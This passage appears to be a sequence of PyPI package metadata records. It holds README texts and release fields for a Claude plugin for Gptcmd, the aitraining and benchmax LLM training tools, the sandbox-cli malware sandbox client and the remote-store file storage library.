accounts, the `account` command in Gptcmd can be used to switch between them: ``` (gpt-4o) account claude Switched to account 'claude' (claude-3-5-sonnet-latest) account default Switched to account 'default' (gpt-4o) ``` Consult Gptcmd's readme for additional usage instructions. ## Prompt caching To save costs, Gptcmd-anthropic dynamically inserts [cache breakpoints](https://docs.anthropic.com/en/docs/build-with-claude/prompt-caching) on the system message (if present), the final user message, and the largest messages of a conversation based on content length and number of attachments. You may override this dynamic strategy on a per-message basis by setting the `anthropic_cache_breakpoint` metadata field: * If set to `True`, the message will always be cached. * If set to `False`, the message will never be cached. * If a span of consecutive messages of the same role contains conflicting breakpoint metadata (one message set to always cache, the next set to never cache), the entire span will be cached. For instance: ``` (claude-opus-4-20250514) user Cache me! 'Cache me!' added as user (claude-opus-4-20250514) meta anthropic_cache_breakpoint True anthropic_cache_breakpoint set to True on 'Cache me!' ``` ## Extended thinking You may enable extended thinking with a command like `set thinking {"type": "enabled", "budget_tokens": 1024}`. When extended thinking mode is enabled, a summary of the thinking process can be found at the `anthropic_thinking_text` metadata field on the generated assistant message. ``` (claude-opus-4-20250514) set thinking {"type": "enabled", "budget_tokens": 1024} thinking set to {'type': 'enabled', 'budget_tokens': 1024} (claude-opus-4-20250514) say The quick brown fox jumps over the lazy dog. ... That's the famous pangram! It's a sentence that contains every letter of the English alphabet at least once. It's commonly used for: - Testing typewriters and keyboards - Displaying font samples - Practicing typing - Testing telecommunication equipment It uses exactly 35 letters total and has been popular since at least the late 1800s. Is there something specific you'd like to know about this sentence, or were you perhaps testing something? (claude-opus-4-20250514) meta anthropic_thinking_text 'The user has sent me the famous pangram "The quick brown fox jumps over the lazy dog." This sentence contains all 26 letters of the English alphabet at least once. They haven\'t asked me to do anything specific with it, so I should acknowledge it and perhaps share something interesting about it.' ``` Newer models support an "adaptive" thinking mode with graduated levels rather than a strict thinking budget. This feature requires version 0.77.0 or later of the Anthropic Python library: ``` (claude-opus-4-6) set thinking {"type": "adaptive"} thinking set to {'type': 'adaptive'} (claude-opus-4-6) set output_config {"effort": "max"} output_config set to {'effort': 'max'} ``` If you use this feature frequently, you might find a macro like this to be helpful (add it to the `[macros]` section of your Gptcmd configuration, adding the section if it doesn't exist). Replace `claude` below with the name of your Gptcmd-anthropic account: ``` toml [macros] ct = """ account claude set thinking {{"type": "adaptive"}} set output_config {{"effort": "{1?max"}}} """ ``` Then, the `ct` command will enable thinking with the "max" reasoning level (by default, or specify the level to use as an argument to the macro). ## Server-side tools Tools provided by Anthropic, such as web search, may be used. However, tool responses (such as search citations) are not currently stored, displayed, or passed back to the model. To search the web with Claude, you might wish to add a macro like this (the first argument specifies the maximum number of searches allowed, default 5) to the `[macros]` section of your Gptcmd configuration (if you also added the thinking macro, you might replace `account claude` in this macro to an invocation of that one, or add this `set` line to that macro): ``` [macros] cw=""" account claude set tools [{{"type": "web_search_20250305", "name": "web_search", "max_uses": {1?5}}}] """ ```
text/markdown
null
Bill Dengler <codeofdusk@gmail.com>
null
null
null
null
[ "Programming Language :: Python :: 3", "License :: OSI Approved :: Mozilla Public License 2.0 (MPL 2.0)", "Operating System :: OS Independent" ]
[]
null
null
>=3.8.6
[]
[]
[]
[ "gptcmd>=2.2.0", "anthropic<1.0.0,>=0.47.0" ]
[]
[]
[]
[ "Homepage, https://github.com/codeofdusk/gptcmd-anthropic", "Bug Tracker, https://github.com/codeofdusk/gptcmd-anthropic/issues" ]
twine/6.2.0 CPython/3.13.11
2026-02-19T22:14:55.194618
gptcmd_anthropic-2.3.0.tar.gz
27,728
7d/a0/b1016a8533a90d97d549a3d2bf802e7fc9e78c91791481bfdd5c8e67f4d9/gptcmd_anthropic-2.3.0.tar.gz
source
sdist
null
false
e0b43614ef69d5650ea4b14b8c882251
5357468febe2632cbe0a30a0a7871071a556e9d80575fe3a237d3e894891b746
7da0b1016a8533a90d97d549a3d2bf802e7fc9e78c91791481bfdd5c8e67f4d9
null
[ "COPYING.txt" ]
236
2.4
aitraining
0.0.44
Advanced Machine Learning Training Platform - IN DEVELOPMENT
<p align="center"> <img src="https://raw.githubusercontent.com/monostate/aitraining/main/docs/images/terminal-wizard.png" alt="AITraining Interactive Wizard" width="700"> </p> <p align="center"> <a href="https://pypi.org/project/aitraining/"><img src="https://img.shields.io/pypi/v/aitraining.svg" alt="PyPI version"></a> <a href="https://pypi.org/project/aitraining/"><img src="https://img.shields.io/pypi/pyversions/aitraining.svg" alt="Python versions"></a> <a href="https://github.com/monostate/aitraining/blob/main/LICENSE"><img src="https://img.shields.io/badge/License-Apache%202.0-blue.svg" alt="License"></a> <a href="https://docs.monostate.com"><img src="https://img.shields.io/badge/docs-monostate.com-FF6B35.svg" alt="Documentation"></a> <a href="https://deepwiki.com/monostate/aitraining"><img src="https://deepwiki.com/badge.svg" alt="Ask DeepWiki"></a> </p> <p align="center"> <b>Train state-of-the-art ML models with minimal code</b> </p> <p align="center"> English | <a href="README_PTBR.md">Portugues</a> </p> <p align="center"> 📚 <b><a href="https://docs.monostate.com">Full Documentation →</a></b> </p> --- > **📖 Comprehensive Documentation Available** > > Visit **[docs.monostate.com](https://docs.monostate.com)** for detailed guides, tutorials, API reference, and examples covering all features including LLM fine-tuning, PEFT/LoRA, DPO/ORPO training, hyperparameter sweeps, and more. --- AITraining is an advanced machine learning training platform built on top of [AutoTrain Advanced](https://github.com/huggingface/autotrain-advanced). It provides a streamlined interface for fine-tuning LLMs, vision models, and more. ## Highlights ### Automatic Dataset Conversion Feed any dataset format and AITraining automatically detects and converts it. Supports 6 input formats with automatic detection: | Format | Detection | Example Columns | |--------|-----------|-----------------| | **Alpaca** | instruction/input/output | `{"instruction": "...", "output": "..."}` | | **ShareGPT** | from/value pairs | `{"conversations": [{"from": "human", ...}]}` | | **Messages** | role/content | `{"messages": [{"role": "user", ...}]}` | | **Q&A** | question/answer variants | `{"question": "...", "answer": "..."}` | | **DPO** | prompt/chosen/rejected | For preference training | | **Plain Text** | Single text column | Raw text for pretraining | ```bash aitraining llm --train --auto-convert-dataset --chat-template gemma3 \ --data-path tatsu-lab/alpaca --model google/gemma-3-270m-it ``` ### 32 Chat Templates Comprehensive template library with token-level weight control: - **Llama family**: llama, llama-3, llama-3.1 - **Gemma family**: gemma, gemma-2, gemma-3, gemma-3n - **Others**: mistral, qwen-2.5, phi-3, phi-4, chatml, alpaca, vicuna, zephyr ```python from autotrain.rendering import get_renderer, ChatFormat, RenderConfig config = RenderConfig(format=ChatFormat.CHATML, only_assistant=True) renderer = get_renderer('chatml', tokenizer, config) encoded = renderer.build_supervised_example(conversation) # Returns: {'input_ids', 'labels', 'token_weights', 'attention_mask'} ``` ### GRPO Training with Custom Environments Train with Group Relative Policy Optimization using your own reward environment. The env provides prompts and scores multi-turn episodes — GRPO generates completions, scores them, and optimizes: ```bash aitraining llm --train --trainer grpo \ --model deepseek-ai/DeepSeek-R1-Distill-Qwen-1.5B \ --rl-env-module my_envs.hotel_env \ --rl-env-class HotelEnv \ --rl-num-generations 4 \ --rl-max-new-tokens 256 ``` Your environment implements three methods: ```python class HotelEnv: def build_dataset(self, tokenizer) -> Dataset: """Return HF Dataset with 'prompt' column.""" def score_episode(self, model, tokenizer, completion, case_idx) -> float: """Run multi-turn episode from completion, return 0.0-1.0 score.""" def get_tools(self) -> list[dict]: """Return tool schemas for generation (optional).""" ``` ### Custom RL Environments (PPO) Build custom reward functions for PPO training with three environment types: ```bash # Text generation with custom reward aitraining llm --train --trainer ppo \ --rl-env-type text_generation \ --rl-env-config '{"stop_sequences": ["</s>"]}' \ --rl-reward-model-path ./reward_model # Multi-objective rewards (correctness + formatting) aitraining llm --train --trainer ppo \ --rl-env-type multi_objective \ --rl-env-config '{"reward_components": {"correctness": {"type": "keyword"}, "formatting": {"type": "length"}}}' \ --rl-reward-weights '{"correctness": 1.0, "formatting": 0.1}' ``` ### Hyperparameter Sweeps Automated optimization with Optuna, random search, or grid search: ```python from autotrain.utils import HyperparameterSweep, SweepConfig, ParameterRange config = SweepConfig( backend="optuna", optimization_metric="eval_loss", optimization_mode="minimize", num_trials=20, ) sweep = HyperparameterSweep( objective_function=train_model, config=config, parameters=[ ParameterRange("learning_rate", "log_uniform", low=1e-5, high=1e-3), ParameterRange("batch_size", "categorical", choices=[4, 8, 16]), ] ) result = sweep.run() # Returns best_params, best_value, trial history ``` ### Enhanced Evaluation Metrics 8 metrics beyond loss, with callbacks for periodic evaluation: | Metric | Type | Use Case | |--------|------|----------| | **Perplexity** | Auto-computed | Language model quality | | **BLEU** | Generation | Translation, summarization | | **ROUGE** (1/2/L) | Generation | Summarization | | **BERTScore** | Generation | Semantic similarity | | **METEOR** | Generation | Translation | | **F1/Accuracy** | Classification | Standard metrics | | **Exact Match** | QA | Question answering | ```python from autotrain.evaluation import Evaluator, EvaluationConfig, MetricType config = EvaluationConfig( metrics=[MetricType.PERPLEXITY, MetricType.BLEU, MetricType.ROUGE, MetricType.BERTSCORE], save_predictions=True, ) evaluator = Evaluator(model, tokenizer, config) result = evaluator.evaluate(dataset) ``` ### Auto LoRA Merge After PEFT training, automatically merge adapters and save deployment-ready models: ```bash # Default: merges adapters into full model aitraining llm --train --peft --model meta-llama/Llama-3.2-1B # Keep adapters separate (smaller files) aitraining llm --train --peft --no-merge-adapter --model meta-llama/Llama-3.2-1B ``` --- ## Screenshots <p align="center"> <img src="https://raw.githubusercontent.com/monostate/aitraining/main/docs/images/chat-screenshot.png" alt="Chat interface for testing trained models" width="700"> <br> <em>Built-in chat interface for testing trained models with conversation history</em> </p> <p align="center"> <img src="https://raw.githubusercontent.com/monostate/aitraining/main/docs/images/tui-wandb.png" alt="Terminal UI with W&B LEET integration" width="700"> <br> <em>Terminal UI with real-time W&B LEET metrics visualization</em> </p> --- ## Installation ```bash pip install aitraining ``` Requirements: Python >= 3.10, PyTorch ## Quick Start ### Interactive Wizard ```bash aitraining ``` The wizard guides you through: 1. Trainer type selection (LLM, vision, NLP, tabular) 2. Model selection with curated catalogs from HuggingFace 3. Dataset configuration with auto-format detection 4. Advanced parameters (PEFT, quantization, sweeps) ### Config File ```bash aitraining --config config.yaml ``` ### Python API ```python from autotrain.trainers.clm import train from autotrain.trainers.clm.params import LLMTrainingParams config = LLMTrainingParams( model="meta-llama/Llama-3.2-1B", data_path="your-dataset", trainer="sft", epochs=3, batch_size=4, lr=2e-5, peft=True, auto_convert_dataset=True, chat_template="llama3", ) train(config) ``` --- ## Comparison ### AITraining vs AutoTrain vs Tinker | Feature | AutoTrain | AITraining | Tinker | |---------|-----------|------------|--------| | **Trainers** | | SFT/DPO/ORPO | Yes | Yes | Yes | | PPO (RLHF) | Basic | Enhanced (TRL) | Advanced | | GRPO | No | Yes (TRL 0.28) | Custom | | Reward Modeling | Yes | Yes | No | | Knowledge Distillation | No | Yes (KL + CE loss) | Yes (text-only) | | **Data** | | Auto Format Detection | No | Yes (6 formats) | No | | Chat Template Library | Basic | 32 templates | 5 templates | | Runtime Column Mapping | No | Yes | No | | Conversation Extension | No | Yes | No | | **Training** | | Hyperparameter Sweeps | No | Yes (Optuna) | Manual | | Custom RL Environments | No | Yes (3 types) | Yes | | Multi-objective Rewards | No | Yes | Yes | | Forward-Backward Pipeline | No | Yes | Yes | | Async Off-Policy RL | No | No | Yes | | Stream Minibatch | No | No | Yes | | **Evaluation** | | Metrics Beyond Loss | No | 8 metrics | Manual | | Periodic Eval Callbacks | No | Yes | Yes | | Custom Metric Registration | No | Yes | No | | **Interface** | | Interactive CLI Wizard | No | Yes | No | | TUI (Experimental) | No | Yes | No | | W&B LEET Visualizer | No | Yes | Yes | | **Hardware** | | Apple Silicon (MPS) | Limited | Full | No | | Quantization (int4/int8) | Yes | Yes | Unknown | | Multi-GPU | Yes | Yes | Yes | | **Task Coverage** | | Vision Tasks | Yes | Yes | No | | NLP Tasks | Yes | Yes | No | | Tabular Tasks | Yes | Yes | No | | Tool Use Environments | No | Yes (GRPO) | Yes | | Multiplayer RL | No | No | Yes | --- ## Supported Tasks | Task | Trainers | Status | |------|----------|--------| | LLM Fine-tuning | SFT, DPO, ORPO, PPO, GRPO, Reward, Distillation | Stable | | Text Classification | Single/Multi-label | Stable | | Token Classification | NER, POS tagging | Stable | | Sequence-to-Sequence | Translation, Summarization | Stable | | Image Classification | Single/Multi-label | Stable | | Object Detection | YOLO, DETR | Stable | | VLM Training | Vision-Language Models | Beta | | Tabular | XGBoost, sklearn | Stable | | Sentence Transformers | Semantic similarity | Stable | | Extractive QA | SQuAD format | Stable | --- ## Configuration Example ```yaml task: llm-sft base_model: meta-llama/Llama-3.2-1B project_name: my-finetune data: path: your-dataset train_split: train auto_convert_dataset: true chat_template: llama3 params: epochs: 3 batch_size: 4 lr: 2e-5 peft: true lora_r: 16 lora_alpha: 32 quantization: int4 mixed_precision: bf16 # Optional: hyperparameter sweep sweep: enabled: true backend: optuna n_trials: 10 metric: eval_loss ``` --- ## Documentation **📚 [docs.monostate.com](https://docs.monostate.com)** — Complete documentation with tutorials, API reference, and examples. ### Quick Links - [Getting Started](https://docs.monostate.com/foundations/quickstart) - [LLM Fine-tuning Guide](https://docs.monostate.com/cli/llm-training) - [YAML Configuration](https://docs.monostate.com/cli/yaml-configs) - [Python SDK Reference](https://docs.monostate.com/api/python-sdk) - [Advanced Training (DPO/ORPO/PPO)](https://docs.monostate.com/advanced/dpo-training) - [Changelog](https://docs.monostate.com/changelog) ### Local Docs - [Interactive Wizard Guide](docs/interactive_wizard.md) - [Dataset Formats & Conversion](docs/dataset_formats.md) - [Trainer Reference](docs/trainers/README.md) - [Python API](docs/api/PYTHON_API.md) - [RL API Reference](docs/reference/RL_API_REFERENCE.md) --- ## License Apache 2.0 - See [LICENSE](LICENSE) for details. Based on [AutoTrain Advanced](https://github.com/huggingface/autotrain-advanced) by Hugging Face. --- <p align="center"> <a href="https://monostate.ai">Monostate AI</a> </p>
text/markdown
null
Andrew Correa <andrew@monostate.ai>
null
null
Apache 2.0
automl, autonlp, autotrain, huggingface, machine learning, deep learning, fine-tuning, llm
[ "Development Status :: 4 - Beta", "Intended Audience :: Developers", "Intended Audience :: Education", "Intended Audience :: Science/Research", "License :: OSI Approved :: Apache Software License", "Operating System :: OS Independent", "Programming Language :: Python :: 3.8", "Programming Language :: ...
[]
null
null
>=3.8
[]
[]
[]
[ "torch>=1.10.0", "transformers==4.57.3", "accelerate==1.11.0", "peft==0.14.0", "trl>=0.28.0", "datasets[vision]~=3.2.0", "tensorboard==2.18.0", "scikit-learn==1.6.0", "evaluate==0.4.3", "sentence-transformers==3.3.1", "albumentations==1.4.23", "Pillow==11.0.0", "pandas==2.2.3", "numpy", ...
[]
[]
[]
[]
twine/6.2.0 CPython/3.13.5
2026-02-19T22:14:03.506233
aitraining-0.0.44.tar.gz
544,540
07/89/c08a311284d220d607662a20f66fe290ba51b156d4b7879cbb7ad2691d40/aitraining-0.0.44.tar.gz
source
sdist
null
false
f00eb6627901b4fc73ed9b540904bfea
63fd7e48f4fbc1c54db35416132f2997adc252fc4bb5a8b6d2c77e5dd5982a48
0789c08a311284d220d607662a20f66fe290ba51b156d4b7879cbb7ad2691d40
null
[ "LICENSE" ]
239
2.4
benchmax
0.1.2.dev14
Framework-Agnostic RL Environments for LLM Fine-Tuning
<picture> <img alt="Benchmax" src="./static/benchmax.png" width="full"> </picture> ## benchmax: Framework-Agnostic RL Environments for LLM Fine-Tuning *A lightweight, training-framework agnostic library for defining, running, and parallelizing environments, to fine-tune OSS LLMs with reinforcement learning.* <div align="center"> </div> <div id="badges" align="center"> <a href="https://cgft.io"> <img src="https://img.shields.io/badge/cgft.io-blue?style=for-the-badge" alt="Website"/> </a> <a href="https://x.com/cgftlabs"> <img src="https://img.shields.io/badge/Follow @cgftlabs-black?style=for-the-badge&logo=X&logoColor=white" alt="@cgftlabs"/> </a> </div> <div align="center" style="line-height: 1;"> <a href="https://github.com/girishbarca/benchmax/blob/main/LICENSE"><img alt="License" src="https://img.shields.io/badge/License-Apache_2.0-blue.svg"/></a> </div> ## 📌 News - **[29 Oct 2025]** 🎉 Added support for easy multi-node parallelization across all major cloud providers using [SkyPilot](https://github.com/skypilot-org/skypilot) - **[29 Oct 2025]** 🎉 Integration with [SkyRL](https://github.com/NovaSky-AI/SkyRL) for distributed RL training across clusters - **[Upcoming]** 🛠️ Integration with Tinker API. ## 📘 Quickstart **Example: Multi-node parallelization of Excel Env with SkyRL and SkyPilot** RL environments can be computationally expensive to run (e.g. running tests). To handle these workloads efficiently, we distribute rollouts across multiple nodes using **SkyPilot**, horizontally scaling `benchmax` across cloud providers like GCP, AWS, Azure, etc. **SkyRL** is a training framework `benchmax` is currently integrated with. Use our ***SkyRL*** integration to RL finetune Qwen-2.5 to do spreadsheet manipulation using a excel MCP parallelized across multiple nodes. The environment is defined in [`benchmax.envs.excel.excel_env.ExcelEnvSkypilot`](/src/benchmax/envs/excel/excel_env.py) 1. **Prepare the dataset** ```bash uv run src/benchmax/adapters/skyrl/benchmax_data_process.py \ --local_dir ~/data/excel \ --dataset_name spreadsheetbench \ --env_path benchmax.envs.excel.excel_env.ExcelEnvLocal ``` Note: We are using `ExcelEnvLocal` instead of `ExcelEnvSkypilot` because the MCP is only used for listing tools to prepare the system prompt. 2. **Run training and parallelize Excel environment** ```bash bash examples/skyrl/run_benchmax_excel.sh ``` This excel env example will spin up 5 nodes with 20 servers per node (total 100 MCP server in parallel). For more details, check out [multi-node parallelization](/src/benchmax/envs/mcp/README.md) and [SkyRL integration](/examples/skyrl/README.md). ## ℹ️ Overview `benchmax` comes with: - A collection of ready-to-use reinforcement learning (RL) environments for LLM fine-tuning ranging from multi-hop search to spreadsheet manipulation to CRM agents - An easy to define, compose, and parallelize your own environments, including leveraging the existing ecosystem of MCP servers - Built-in integrations with popular RL training libraries (skyrl, etc.). `benchmax` is trainer-agnostic by design Define your environment as: 1. A **toolset** (LLM calls, external APIs, calculators, MCPs, etc.). 2. **Output parsing** logic to extract structured observations. 3. **Reward functions** to score model outputs. Rollout management, parallel execution, etc. comes out of the box. ⭐ Star our repository to show your support! ## 💡 Core Features **Built-in examples & templates** Get started with ready to use recipes, from Wikipedia search to spreadsheet manipulation. Easy to copy, customize, and extend. And yes, more are on the way. **Trainer integrations** Use your own trainer or training framework - no lock-in. `benchmax` is already integrated into SkyRL, with more integrations (Tinker, etc.) coming soon! **MCP support** Tap into the growing MCP ecosystem and integrate them as tools within your environments. **Multi-node parallel execution** Multi-node parallelization enabled out of the box with state isolation across roll-outs (e.g. editing files on filesystem, etc.). ## 🌐 Creating & Training with Environments ### What is an environment? An environment consists of: - A list of tools that an LLM can call - A list of reward functions that evaluate the quality & correctness of the model's final output. We also support MCP servers natively, allowing you to easily leverage the many servers built by the community. ### Pre-built environments Ready-to-use environments with pre-configured tools and reward functions. - [CRM](/src/benchmax/envs/crm/README.md) - [Excel](/src/benchmax/envs/excel/README.md) - [Math](/src/benchmax/envs/math/README.md) - [Wikipedia](/src/benchmax/envs/wikipedia/README.md) ### How do I create a custom environment? 1. [With existing MCP servers](/src/benchmax/envs/mcp/README.md) (Built-in support for multi-node parallelization) 2. [Extend BaseEnv](/src/benchmax/envs/README.md) ### How about more complex environments? - Check out our excel spreadsheet RL environment: `benchmax.envs.excel.excel_env.ExcelEnv` ### How do I use an environment with my preferred RL Trainer? We currently have integrations with SkyRL. More incoming! [`benchmax` environments with skyrl](/examples/skyrl/README.md) ### I want a specific environment Open an issue and tag us & we will look into building you one! --- ## 🎯 Motivation - **Modularity and Simplicity**: We set out to build a lightweight, modular system for defining RL environments—breaking them down into simple, composable parts: tools, tool output parsing, and reward functions. The goal’s to make it easy for software engineers to build and experiment with RL environments without needing deep RL expertise. - **Trainer Integrations**: There’s been lots of new RL training frameworks popping up (e.g., numerous forks of verl) & we expect this to continue. They are often tightly coupled with specific environments, leading to fragmentation and limited compatibility. We are building `benchmax` as a standalone library with integrations to these different training frameworks & as an easy way for new frameworks to tap into an existing pool of environments. We're already integrated with SkyRL (Tinker coming soon)! - **Task Recipes and Ideas**: We want `benchmax` to be a living library of reusable, RL-compatible task recipes, ready to inspire and extend beyond the usual suspects like math and coding. We aim to support more real-world workflows, including open-ended and long-horizon tasks. - **Parallelization and Cloud Compatibility**: - Enable efficient parallelization with maintained statefulness between rollouts. - Facilitate easy deployment and scalability in cloud environments. - **MCP as a first class citizen**: There has been an explosion of MCP servers/tools built out for use-cases ranging from browser use to excel to game creation.`benchmax` allows folks to leverage and compose these existing MCP servers to build environments integrated with real world systems e.g. excel ## 🤝 Contributing We welcome new environment recipes, bug reports, and trainer integrations! ⭐ Star our repository to show your support! ## 📜 License Apache 2.0 © 2025 CGFT Inc.
text/markdown
cgft.io
null
null
null
null
null
[ "Programming Language :: Python :: 3", "Operating System :: OS Independent" ]
[]
null
null
>=3.12
[]
[]
[]
[ "aiohttp>=3.13.1", "asyncio>=4.0.0", "cloudpickle>=3.0.0", "datasets>=4.0.0", "fastmcp~=2.12.0; extra == \"mcp\"", "pyjwt>=2.10.1; extra == \"mcp\"", "skypilot[aws,gcp]~=0.8.1; extra == \"skypilot\"", "pip>=25.3; extra == \"skypilot\"", "msrestazure>=0.6.4.post1; extra == \"skypilot\"" ]
[]
[]
[]
[]
uv/0.8.13
2026-02-19T22:13:50.601225
benchmax-0.1.2.dev14.tar.gz
70,605
85/ed/d737283b455398b1141553a9e5ab666367949df1be5686a1fcddc8845ba3/benchmax-0.1.2.dev14.tar.gz
source
sdist
null
false
14357f8eb998618d9ba067d1d4ee17e9
3298f772478e4fe2e40758b1c66b15deda8aec7215135dcc87d7b57edbf231af
85edd737283b455398b1141553a9e5ab666367949df1be5686a1fcddc8845ba3
null
[ "LICENSE" ]
216
2.4
sandbox-cli
0.2.47
Command line tool for interaction with sandboxes
![Image](https://raw.githubusercontent.com/Security-Experts-Community/sandbox-cli/refs/heads/main/docs/assets/logo_with_text.svg) <p align="center"> <em>Work with PT Sandbox like a pro</em> </p> --- **Documentation**: <a href="https://security-experts-community.github.io/sandbox-cli">https://security-experts-community.github.io/sandbox-cli</a> **Source Code**: <a href="https://github.com/Security-Experts-Community/sandbox-cli">https://github.com/Security-Experts-Community/sandbox-cli</a> --- > [!NOTE] > `python >= 3.11` is required. ## Installation Using `pipx`: ```sh pipx install sandbox-cli ``` Using `PyPi`: ```sh pip install sandbox-cli ``` NixOS: ```sh nix shell 'github:Security-Experts-Community/sandbox-cli' ``` ### Config You must create default config file as described in `docs/config-examples/config.toml`: Linux/MacOS: ```sh ~/.config/sandbox-cli/config.toml or $XDG_HOME_CONFIG_HOME/sandbox-cli/config.toml ``` Windows: ```ps1 %APPDATA%\sandbox-cli\config.toml ``` ## Available options - `scanner` - Scan with the sandbox. - `images` - Get available images in the sandbox. - `download` - Download any artifact from the sandbox. - `email` - Upload an email and get its headers. - `report` - Generate short report from sandbox scans. - `unpack`/`conv` - Convert sandbox logs into an analysis-friendly format. - `rules` - Working with raw sandbox rules. <p align="middle"> <img width="50%" src="https://raw.githubusercontent.com/Security-Experts-Community/sandbox-cli/refs/heads/main/docs/assets/pic_right.svg"> </p> ## Usage examples ### images Get all availables images: ```bash sandbox-cli images ``` ```bash ┏━━━━━━━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━┓ ┃ Name ┃ ID ┃ Version ┃ Product version ┃ ┡━━━━━━━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━┩ │ altlinux │ altworkstation-10-x64 │ ... │ ... │ │ astra │ astralinux-smolensk-x64 │ ... │ ... │ │ redos │ redos-murom-x64 │ ... │ ... │ │ ubuntu │ ubuntu-jammy-x64 │ ... │ ... │ │ Windows 10 Pro │ win10-1803-x64 │ ... │ ... │ │ Windows 10 Enterprise │ win10-22H2-x64 │ ... │ ... │ │ Windows 10 Pro │ win11-23H2-x64 │ ... │ ... │ │ Windows 7 Enterprise │ win7-sp1-x64 │ ... │ ... │ │ Windows 7 Enterprise │ win7-sp1-x64-ics │ ... │ ... │ └───────────────────────┴─────────────────────────┴────────────┴─────────────────┘ ``` ### scanner Scan the file on all available windows images with timeout 60s and with automatic logs unpacking: ```bash sandbox-cli scanner scan-new -i windows -t 60 -U malware.exe ``` <p align="middle"> <img width="50%" src="https://raw.githubusercontent.com/Security-Experts-Community/sandbox-cli/refs/heads/main/docs/assets/pic_left.svg"> </p> ## Development `uv` is used to build the project. ```bash uv sync ```
text/markdown
Alexey Kolesnikov
null
null
null
null
null
[]
[]
null
null
>=3.11
[]
[]
[]
[ "aiofiles>=24.1.0", "asyncssh>=2.21.1", "colorama>=0.4.6", "cryptography>=46.0.2", "cyclopts>=4.2.5", "docker>=7.1.0", "ptsandbox>=5.0.8", "pyzipper>=0.3.6", "rich>=14.1.0", "zstandard>=0.23.0" ]
[]
[]
[]
[ "Homepage, https://github.com/Security-Experts-Community/sandbox-cli", "Documentation, https://security-experts-community.github.io/sandbox-cli", "Repository, https://github.com/Security-Experts-Community/sandbox-cli", "Issues, https://github.com/Security-Experts-Community/sandbox-cli/issues" ]
twine/6.2.0 CPython/3.13.12
2026-02-19T22:13:43.069200
sandbox_cli-0.2.47.tar.gz
35,034
c9/2a/1f15e8238af80c82e3dd4993d470245e6ed7c75710870bceb1e977e9a268/sandbox_cli-0.2.47.tar.gz
source
sdist
null
false
ea65125223e4997693b36bb7d8b13438
6929b3210208f229f2408c146e8b28c800e107ea45bcad2f571d871d80b49eae
c92a1f15e8238af80c82e3dd4993d470245e6ed7c75710870bceb1e977e9a268
MIT
[ "LICENSE", "NOTICE" ]
226
2.4
remote-store
0.4.3
One simple API for file storage. Local, S3, SFTP, Azure. Same methods, swappable backends, zero reinvention.
<p align="center"> <img src="https://raw.githubusercontent.com/haalfi/remote-store/master/assets/logo.png" width="320" alt="remote-store logo"> </p> <h1 align="center">remote-store</h1> <p align="center"> One simple API for file storage. Local, S3, SFTP, Azure. Same methods, swappable backends, zero reinvention. </p> <p align="center"> <a href="https://pypi.org/project/remote-store/"><img src="https://img.shields.io/pypi/v/remote-store" alt="PyPI version"></a> <a href="https://pypi.org/project/remote-store/"><img src="https://img.shields.io/pypi/pyversions/remote-store" alt="Python versions"></a> <a href="https://remote-store.readthedocs.io/"><img src="https://readthedocs.org/projects/remote-store/badge/?version=latest" alt="Documentation Status"></a> <a href="https://github.com/haalfi/remote-store/blob/master/LICENSE"><img src="https://img.shields.io/pypi/l/remote-store" alt="License"></a> </p> `remote-store` gives you one simple API to read, write, list, and delete files. The same methods work whether your files live on disk, in S3, on an SFTP server, or anywhere else. You just swap the backend config. That's the whole trick. Reads and writes stream by default, so large files just work. Under the hood, each backend delegates to the library you'd pick anyway (`boto3`, `paramiko`, `azure-storage-blob`, …). This package doesn't reinvent file I/O. It just gives every backend the same simple front door. ## What you get - **One `Store`, many backends:** local fs, S3, SFTP, Azure Blob, more to come - **Just the basics:** read, write, list, delete, exists. No magic, no surprises - **Battle-tested I/O under the hood:** backends wrap `boto3`, `paramiko`, etc. - **Swappable via config:** switch backends without touching application code - **Streaming by default:** reads and writes handle large files without blowing up memory - **Atomic writes** where the backend supports it - **Zero runtime dependencies:** the core package installs nothing; backend extras pull in only what they need - **Typed & tested:** strict mypy, spec-driven test suite ## Installation Install from [PyPI](https://pypi.org/project/remote-store/): ```bash pip install remote-store ``` Backends that need extra dependencies use extras: ```bash pip install remote-store[s3] # Amazon S3 / MinIO pip install remote-store[s3-pyarrow] # S3 with PyArrow (high-throughput) pip install remote-store[sftp] # SFTP / SSH ``` ## Quick Start ```python import tempfile from remote_store import BackendConfig, RegistryConfig, Registry, StoreProfile with tempfile.TemporaryDirectory() as tmp: config = RegistryConfig( backends={"local": BackendConfig(type="local", options={"root": tmp})}, stores={"data": StoreProfile(backend="local", root_path="data")}, ) with Registry(config) as registry: store = registry.get_store("data") store.write("hello.txt", b"Hello, world!") content = store.read_bytes("hello.txt") print(content) # b'Hello, world!' ``` Switch to S3 by changing the config. The rest of the code stays the same: ```python config = RegistryConfig( backends={"s3": BackendConfig(type="s3", options={"bucket": "my-bucket"})}, stores={"data": StoreProfile(backend="s3", root_path="data")}, ) ``` ## Configuration Configuration is declarative and immutable. Build it from Python objects or parse it from a dict (e.g. loaded from TOML/JSON): ```python from remote_store import RegistryConfig config = RegistryConfig.from_dict({ "backends": { "local": {"type": "local", "options": {"root": "/data"}}, }, "stores": { "uploads": {"backend": "local", "root_path": "uploads"}, "reports": {"backend": "local", "root_path": "reports"}, }, }) ``` ## Store API **Read & write** |Method |Description | |-----------------------------|----------------------------| |`read(path)` |Streaming read (`BinaryIO`) | |`read_bytes(path)` |Full content as `bytes` | |`write(path, content)` |Write bytes or binary stream| |`write_atomic(path, content)`|Write via temp file + rename| **Browse & inspect** |Method |Description | |-----------------------------------|--------------------------------| |`list_files(path)` |Iterate `FileInfo` objects | |`list_folders(path)` |Iterate subfolder names | |`exists(path)` |Check if a file or folder exists| |`is_file(path)` / `is_folder(path)`|Type checks | |`get_file_info(path)` |File metadata (`FileInfo`) | |`get_folder_info(path)` |Folder metadata (`FolderInfo`) | **Manage** |Method |Description | |---------------------|----------------------------------------------| |`delete(path)` |Delete a file | |`delete_folder(path)`|Delete a folder | |`move(src, dst)` |Move or rename | |`copy(src, dst)` |Copy a file | **Utility** |Method |Description | |---------------------|----------------------------------------------| |`supports(capability)`|Check if the backend supports a capability | |`to_key(path)` |Convert native/absolute path to store-relative key| |`close()` |Close the underlying backend | All write/move/copy methods accept `overwrite=True` to replace existing files. For full details, see the [API reference](https://remote-store.readthedocs.io/en/latest/api/store/). ## Supported Backends |Backend |Status |Extra | 